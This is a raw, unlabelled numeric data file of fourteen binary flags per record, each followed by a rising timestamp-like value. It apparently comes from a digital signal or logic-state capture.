0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717836e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2717844e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2717888e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2717912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717920e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2717964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2717988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718060e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718112e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718212e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718216e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2718260e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718288e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2718292e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718296e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718312e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718444e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2718488e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718512e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718520e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718612e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718660e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718712e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718716e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2718764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718796e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718836e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718844e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2718888e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2718912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718920e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2718964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2718988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719012e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2719016e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719020e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2719036e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719068e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719112e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719312e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719336e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719460e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719512e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719516e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2719564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719596e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719644e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2719688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719720e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719736e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2719884e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719908e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719916e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2719960e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2719984e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2719992e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720084e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720108e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720132e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720160e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720184e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720284e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720308e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720332e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720360e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720384e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720484e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720508e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720532e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720560e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720584e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720684e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720732e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2720812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2720836e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2720844e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,3.2845192e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,3.2845420e-02 1,0,0,1,0,1,0,0,0,1,0,1,0,1,3.2845452e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,3.2845476e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,1,3.2845784e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2845816e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2845820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2845868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2845892e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2845940e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2845968e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2846020e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846024e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846092e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846116e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846124e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2846140e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846168e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846192e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846220e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2846244e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846268e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846276e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846316e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846340e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846392e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846420e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846544e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846568e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846572e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2846592e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846624e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846644e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846668e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846672e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2846692e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2846716e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846724e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846768e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846792e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846844e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846868e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846916e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2846940e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2846988e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2847020e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2847044e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2847068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847092e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847116e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2847124e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2847140e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2847168e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847244e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847292e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847316e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847364e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847388e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847444e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847468e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2847472e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2847492e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2847516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847524e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847540e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847564e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847588e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847612e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847644e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847668e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847692e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847716e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847740e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847768e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847792e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847844e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847868e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847892e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847916e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2847968e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2847992e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2847996e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2848044e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2848068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848140e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848268e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848292e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2848300e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2848316e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2848340e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848368e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848392e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848444e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848540e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848568e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2848596e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2848644e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2848672e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848676e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848696e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848720e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848772e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2848776e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2848780e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2848796e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2848820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848828e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848896e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2848948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2848972e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849048e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849096e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849120e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2849124e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2849148e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2849172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849180e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849248e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849268e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849292e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849320e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849396e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849420e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849448e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849468e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849492e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849520e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849572e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2849576e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2849580e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2849620e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2849648e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2849668e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2849696e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849848e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849924e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2849928e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2849948e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2849972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2849980e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2849996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850020e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850072e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850148e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850220e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2850228e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2850276e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2850300e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2850304e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850308e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850448e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850472e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850596e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850620e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850672e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2850700e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2850748e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2850772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850780e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850824e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850848e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850924e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2850948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2850972e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2850976e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2850980e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2851024e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851048e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2851052e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851056e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851072e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851100e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851148e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851196e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851248e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851252e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2851300e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851332e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851372e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2851376e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851380e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2851424e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851448e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2851452e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851456e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851472e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851596e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851604e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2851620e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851648e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851652e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851700e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851724e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851772e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2851776e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851780e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2851796e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2851820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851828e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851876e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851900e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2851948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2851972e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852024e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852048e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852124e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2852128e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2852148e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2852172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852180e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852220e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2852228e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2852276e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2852300e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2852304e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852308e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852372e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852396e-02 